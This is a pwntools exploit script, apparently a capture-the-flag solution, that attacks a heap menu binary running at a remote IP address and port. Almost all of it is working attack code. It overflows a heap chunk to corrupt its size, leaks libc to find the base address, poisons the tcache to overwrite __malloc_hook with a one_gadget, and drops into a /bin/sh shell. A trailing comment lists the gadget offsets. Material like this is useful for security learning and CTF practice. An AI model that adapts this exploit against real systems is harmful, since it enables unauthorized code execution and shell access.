1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
| from pwn import*
context.log_level='debug'
elf=ELF("./pwn")
libc = ELF("./libc-2.27.so")
p=remote("113.201.14.253","14745")
def add(size):
p.sendlineafter("Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:",b"1")
p.sendlineafter("Enter size to add:",str(size).encode())
def show(idx):
p.sendlineafter("Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:",b"3")
p.sendlineafter("Enter index to show:",str(idx).encode())
def edit(idx,size, con):
p.sendlineafter("Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:",b"4")
p.sendlineafter("Enter index to edit:",str(idx).encode())
p.sendlineafter("input size",str(size).encode())
p.sendlineafter("input",con)
def call_exit():
p.sendlineafter("Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:",b"0")
add(0x68)
edit(0,0x70,b'a'*0x68+p64(0xd41))
add(0xd50)
add(0xd10)
show(2)
p.recvuntil("Chunk at index 2: ")
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x3ebca0
print("libc_base = ",hex(libc_base))
system=libc_base+libc.sym["system"]
free_hook=libc_base+libc.sym["__free_hook"]
malloc_hook=libc_base+libc.sym["__malloc_hook"]
ogg=libc_base+0x4f322
edit(1,0xd60,b'b'*0xd58+p64(0x2a1))
add(0x300)
edit(1,0xd68,b'b'*0xd58+p64(0x281)+p64(malloc_hook))
add(0x270)
add(0x270)
edit(5,0x8,p64(ogg))
add(0)
p.interactive()
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
|